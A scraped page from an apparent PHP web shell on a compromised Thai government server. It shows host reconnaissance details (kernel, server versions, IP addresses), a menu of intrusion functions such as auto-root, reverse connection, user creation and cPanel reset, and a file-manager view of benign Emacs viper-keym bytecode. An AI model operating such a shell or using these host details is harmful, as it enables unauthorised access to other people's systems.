Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
emacs /
23.1 /
lisp /
emulation /
[ HOME SHELL ]
Name
Size
Permission
Action
crisp.elc
10.33
KB
-rw-r--r--
cua-base.elc
38.36
KB
-rw-r--r--
cua-gmrk.elc
10.5
KB
-rw-r--r--
cua-rect.elc
38.43
KB
-rw-r--r--
edt-lk201.elc
1.54
KB
-rw-r--r--
edt-mapper.elc
11.76
KB
-rw-r--r--
edt-pc.elc
1.51
KB
-rw-r--r--
edt-vt100.elc
902
B
-rw-r--r--
edt.elc
63.21
KB
-rw-r--r--
keypad.elc
6.52
KB
-rw-r--r--
pc-mode.elc
1.5
KB
-rw-r--r--
pc-select.elc
30.71
KB
-rw-r--r--
tpu-edt.elc
59.56
KB
-rw-r--r--
tpu-extras.elc
10.79
KB
-rw-r--r--
tpu-mapper.elc
10.83
KB
-rw-r--r--
vi.elc
47.55
KB
-rw-r--r--
vip.elc
77.32
KB
-rw-r--r--
viper-cmd.elc
126.33
KB
-rw-r--r--
viper-ex.elc
47.32
KB
-rw-r--r--
viper-init.elc
33.31
KB
-rw-r--r--
viper-keym.elc
22.3
KB
-rw-r--r--
viper-macs.elc
18.69
KB
-rw-r--r--
viper-mous.elc
15.95
KB
-rw-r--r--
viper-util.elc
33.08
KB
-rw-r--r--
viper.elc
26.61
KB
-rw-r--r--
ws-mode.elc
20.31
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : viper-keym.elc
;ELC ;;; Compiled by mockbuild@c6b8.bsys.dev.centos.org on Thu Feb 19 13:02:59 2015 ;;; from file /builddir/build/BUILD/emacs-23.1/lisp/emulation/viper-keym.el ;;; in Emacs version 23.1.1 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. (if (and (boundp 'emacs-version) (< (aref emacs-version (1- (length emacs-version))) ?A) (or (and (boundp 'epoch::version) epoch::version) (string-lessp emacs-version "19.29"))) (error "`viper-keym.el' was compiled for Emacs 19.29 or later")) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (byte-code "\300\301!\204\n \301\302M\210\303\304!\207" [fboundp declare-function (macro . #[(&rest r) "\300\207" [nil] 1]) require viper-util] 2) #@141 *Set to nil if you want complete Vi compatibility in insert mode. Complete compatibility with Vi is not recommended for power use of Viper. (custom-declare-variable 'viper-want-emacs-keys-in-insert 't '(#$ . -769) :type 'boolean :group 'viper) #@128 *Set to nil if you want complete Vi compatibility in Vi mode. Full Vi compatibility is not recommended for power use of Viper. (custom-declare-variable 'viper-want-emacs-keys-in-vi 't '(#$ . -1020) :type 'boolean :group 'viper) #@421 *If true, multiple ESC in Vi mode will cause bell to ring. This is set to t on a windowing terminal and to 'twice on a dumb terminal (unless the user level is 1, 2, or 5). On a dumb terminal, this enables cursor keys and is generally more convenient, as terminals usually don't have a convenient Meta key. Setting viper-no-multiple-ESC to nil will allow as many multiple ESC, as is allowed by the major mode in effect. (custom-declare-variable 'viper-no-multiple-ESC 't '(#$ . -1255) :type 'boolean :group 'viper) #@89 *If non-nil, C-h gets bound to help-command; otherwise, C-h gets the usual Vi bindings. (custom-declare-variable 'viper-want-ctl-h-help 'nil '(#$ . -1776) :type 'boolean :group 'viper) (byte-code "\301B\302\301!\204 \303\301\304 \"\210\305B\302\305!\204 \303\305\304 \"\210\306B\302\306!\2040 \303\306\304 \"\210\307B\302\307!\204@ \303\307\304 \"\210\301\207" [current-load-list viper-vi-intercept-map default-boundp set-default make-sparse-keymap viper-insert-intercept-map viper-emacs-intercept-map viper-overriding-map] 3) #@305 Keymap for user-defined local bindings. Useful for changing bindings such as ZZ in certain major modes. For instance, in letter-mode, one may want to bind ZZ to mh-send-letter. In a newsreader such as gnus, tin, or rn, ZZ could be bound to save-buffers-kill-emacs then post article, etc. (buffer local) (defvar viper-vi-local-user-map (make-sparse-keymap) (#$ . 2320)) (byte-code "\300\301!\210\302\301\303\304#\207" [make-variable-buffer-local viper-vi-local-user-map put permanent-local t] 4) #@88 Keymap for user-defined global bindings. These bindings are seen in all Viper buffers. (defvar viper-vi-global-user-map (make-sparse-keymap) (#$ . 2822)) #@99 This is the main keymap in effect in Viper's Vi state. This map is global, shared by all buffers. (defvar viper-vi-basic-map (make-keymap) (#$ . 2982)) #@65 This keymap keeps keyboard macros defined via the :map command. (defvar viper-vi-kbd-map (make-sparse-keymap) (#$ . 3140)) #@154 This keymap is in use when the user asks Viper to simulate Vi very closely. This happens when viper-expert-level is 1 or 2. See viper-set-expert-level. (defvar viper-vi-diehard-map (make-sparse-keymap) (#$ . 3270)) #@87 Auxiliary map for per-buffer user-defined keybindings in Insert state. (buffer local) (defvar viper-insert-local-user-map (make-sparse-keymap) (#$ . 3492)) (byte-code "\300\301!\210\302\301\303\304#\207" [make-variable-buffer-local viper-insert-local-user-map put permanent-local t] 4) #@65 Auxiliary map for global user-defined bindings in Insert state. (defvar viper-insert-global-user-map (make-sparse-keymap) (#$ . 3784)) #@31 The basic insert-mode keymap. (defvar viper-insert-basic-map (make-sparse-keymap) (#$ . 3925)) #@184 Map used when user wants vi-style keys in insert mode. Most of the Emacs keys are suppressed. This map overshadows viper-insert-basic-map. Not recommended, except for novice users. (defvar viper-insert-diehard-map (make-keymap) (#$ . 4027)) #@56 This keymap keeps VI-style kbd macros for insert mode. (defvar viper-insert-kbd-map (make-sparse-keymap) (#$ . 4276)) #@36 Map used in Viper's replace state. (defvar viper-replace-map (make-sparse-keymap) (#$ . 4400)) #@64 Auxiliary map for global user-defined bindings in Emacs state. (defvar viper-emacs-global-user-map (make-sparse-keymap) (#$ . 4501)) #@55 This keymap keeps Vi-style kbd macros for Emacs mode. (defvar viper-emacs-kbd-map (make-sparse-keymap) (#$ . 4640)) #@78 Auxiliary map for local user-defined bindings in Emacs state. (buffer local) (defvar viper-emacs-local-user-map (make-sparse-keymap) (#$ . 4762)) (byte-code "\301\302!\210\303\302\304\305#\210\306B\307\306!\204 \310\306\311 \"\210\312B\307\312!\204* \310\312\311 \"\210\301\207" [current-load-list make-variable-buffer-local viper-emacs-local-user-map put permanent-local t viper-empty-keymap default-boundp set-default make-sparse-keymap viper-mode-map] 4) #@160 The key used to change states from Emacs to Vi and back. In insert mode, this key also functions as Meta. Enter as a sexp. Examples: "\C-z", [(control ?z)]. (custom-declare-variable 'viper-toggle-key '[(control 122)] '(#$ . 5232) :type 'sexp :group 'viper :set #[(symbol value) "\304\300!\203\n \202 \305\306\307\310 \"\210\311\n\")\207" [viper-toggle-key old-value symbol value boundp [(control 122)] mapc #[(buf) "\212q\210\306\301!\203 \307 !\203 \n\203 \310 \n\311#\210\310 \312#\210\306\304!\203<